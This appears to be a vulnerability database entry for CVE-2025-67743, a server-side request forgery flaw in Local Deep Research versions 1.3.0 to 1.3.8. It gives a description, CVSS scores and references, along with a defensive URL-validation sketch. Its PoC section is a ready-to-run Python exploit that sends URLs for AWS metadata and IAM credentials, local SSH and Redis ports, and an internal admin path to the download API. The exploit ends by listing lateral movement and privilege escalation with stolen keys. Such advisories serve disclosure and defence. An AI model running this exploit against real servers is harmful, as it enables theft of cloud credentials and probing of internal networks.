Security Vulnerability Report
CVE-2025-67743 CVSS 6.3 MEDIUM

CVE-2025-67743

Published: 2025-12-23 01:15:43
Last Modified: 2025-12-29 16:08:52

Description

Local Deep Research is an AI-powered research assistant for deep, iterative research. In versions from 1.3.0 to before 1.3.9, the download service (download_service.py) makes HTTP requests using raw requests.get() without utilizing the application's SSRF protection (safe_requests.py). This can allow attackers to access internal services and attempt to reach cloud provider metadata endpoints (AWS/GCP/Azure), as well as perform internal network reconnaissance, by submitting malicious URLs through the API, depending on the deployment and surrounding controls. This issue has been patched in version 1.3.9.
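
The kind of destination check an SSRF guard applies before fetching a user-supplied URL is sketched below as an added example; it is not Local Deep Research's safe_requests.py or any code from the project. The names check_url, fake_resolver and CONSTRUCTED_DNS and the example.test hosts are assumptions made for illustration.

```python
# Added example (not the project's code): reject URLs whose host resolves
# to a loopback, private, link-local or otherwise non-public address.
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def system_resolver(host, port):
    """Return every address the OS resolver gives for host."""
    infos = socket.getaddrinfo(host, port, proto=socket.IPPROTO_TCP)
    return [info[4][0] for info in infos]


def check_url(url, resolver=system_resolver):
    """Return (allowed, reason) for a user-supplied download URL."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if not parts.hostname:
        return False, "no host in URL"
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
        addresses = resolver(parts.hostname, port)
    except (OSError, ValueError) as exc:
        return False, f"cannot resolve host: {exc}"
    if not addresses:
        return False, "host resolved to no addresses"
    # Every resolved address must be public: one internal record is enough
    # for the fetch to land inside the network.
    for addr in addresses:
        ip = ipaddress.ip_address(addr.split("%")[0])  # drop IPv6 zone id
        if not ip.is_global:
            return False, f"{parts.hostname} resolves to non-public {ip}"
    return True, "ok"


# Constructed DNS answers so the example runs offline; IP literals map to
# themselves.
CONSTRUCTED_DNS = {
    "docs.example.test": ["93.184.216.34"],
    "intranet.example.test": ["93.184.216.34", "10.0.0.5"],
    "localhost": ["127.0.0.1"],
}


def fake_resolver(host, port):
    return CONSTRUCTED_DNS.get(host, [host])
```

A check like this only covers the URL as submitted: each redirect hop needs the same check, and the request should connect to the address that was validated rather than resolving the name a second time.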

CVSS Details

CVSS Score: 6.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:learningcircuit:local_deep_research:*:*:*:*:*:*:*:* - VULNERABLE
Local Deep Research >= 1.3.0
Local Deep Research < 1.3.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-67743 SSRF PoC
# Target: Local Deep Research <= 1.3.8
# Attack: Exploit SSRF to access AWS EC2 metadata
import requests
import json

# Target endpoint (adjust based on actual API)
TARGET_URL = "http://target-server:8000/api/research/download"

# Payload to exploit SSRF - Access AWS EC2 metadata service
ssrf_payloads = [
    "http://169.254.169.254/latest/meta-data/",
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "http://169.254.169.254/latest/meta-data/instance-id",
    "http://169.254.169.254/latest/user-data/",
    "http://localhost:22/",
    "http://127.0.0.1:6379/",
    "http://10.0.0.1:8080/admin"
]


def exploit_ssrf(target_url, payload):
    """
    Send malicious URL to download service
    The vulnerable code uses requests.get() directly
    instead of safe_requests.get() with SSRF protection
    """
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }

    # Malicious request payload
    data = {
        "url": payload,
        "task_id": "test_123"
    }

    try:
        response = requests.post(target_url, json=data, headers=headers, timeout=10)
        print(f"[*] Payload: {payload}")
        print(f"[*] Status: {response.status_code}")
        print(f"[*] Response: {response.text[:500]}")
        print("-" * 50)
        return response.text
    except Exception as e:
        print(f"[!] Error: {e}")
        return None


if __name__ == "__main__":
    print("CVE-2025-67743 SSRF Exploitation Test")
    print("=" * 50)

    for payload in ssrf_payloads:
        result = exploit_ssrf(TARGET_URL, payload)

    # Check if sensitive data was exfiltrated
    print("\n[!] If credentials found, attacker can:")
    print(" 1. Use AWS keys for lateral movement")
    print(" 2. Access internal services")
    print(" 3. Escalate privileges in cloud environment")
```

References

https://github.com/LearningCircuit/local-deep-research/commit/b79089ff30c5d9ae77e6b903c408e1c26ad5c055 (Patch)
https://github.com/LearningCircuit/local-deep-research/security/advisories/GHSA-9c54-gxh7-ppjc (Exploit, Vendor Advisory)

Additional Record Data

Vulnerability Status: Analyzed
Weakness: CWE-918
Primary CVSS Score: 6.5 MEDIUM
Primary CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N